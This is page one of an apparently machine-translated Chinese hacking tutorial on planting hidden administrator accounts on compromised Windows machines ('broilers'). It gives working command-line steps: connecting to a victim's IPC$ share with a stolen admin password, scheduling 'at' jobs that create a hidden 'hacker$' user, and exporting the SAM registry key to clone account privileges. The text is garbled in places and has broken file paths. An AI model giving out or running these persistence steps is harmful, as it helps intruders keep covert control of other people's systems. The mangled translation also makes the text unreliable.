Master summary of those methods that hide superusers

A superuser is a user who is responsible for managing and maintaining the network. This term has a special meaning on the NetWare web. The superuser has full access to all file files, directories, and files, and is the first user to log in to the server after installation. The superuser then immediately changes the password so no other users can access the server and gain unlimited access to the superuser. So how do you hide the superusers in the system? Here are a list of the various hidden superuser methods in the system.

First, how to remotely create hidden superusers under the command line

The command of at will be used here, because the scheduled task generated by at is run as the system, so the psu.exe program is not used. In order to be able to use the at command, the broiler must have the service of the schedule. If it is not enabled, it can be started remotely by using the tool netsvc.exe or sc.exe in the streamer. Of course, the method can also be used as long as the schedule service can be started.

For the command line mode, you can use a variety of connection methods, such as using SQLexec to connect MSSQL port 1433, you can also use the telnet service, as long as you can get a cmdshell, and have the right to run the at command can.

1. First find a broiler. As for how to find it, it is not the topic I mentioned here. Here we assume that we have found a broiler with a superuser of administrator and a password of 12345678. Now we start to create a hidden superuser for it remotely from the command line. (The host in the example is a host in my LAN. I changed its ip address to 13.50.97.238. Do not sit in the Internet to avoid harassing the normal ip address.)

2 First, establish a connection with the broiler, the command is: net use 13.50.97.238ipc$ "12345678" /user:"administrator

3. Use the at command to create a user on the broiler (if the at service is not started) , can be started remotely with netsvc.exe or sc.exe):

at 13.50.97.238 12:51 c:\\winntsystem32net.exe user hacker$ 1234 /add

Create this The user name with the $ character is added. Because the $ character is added, the user will not be displayed with the net user on the command line, but the user can be seen in the account manager.

4, also use the at command to export the HKEY_LOCAL_MACHINEsamsamDomainsaccountusers key:

at 13.50.97.238 12:55 c:\\winntregedit.exe /e hacker.reg

HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers< Br>

/e is the parameter of regedit.exe, which must end in the _LOCAL_MACHINESAMSAMDomainsaccountusers key. If necessary, you can enclose "ld:;c:\\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”" in quotation marks. Previous12Next page Total 2 pages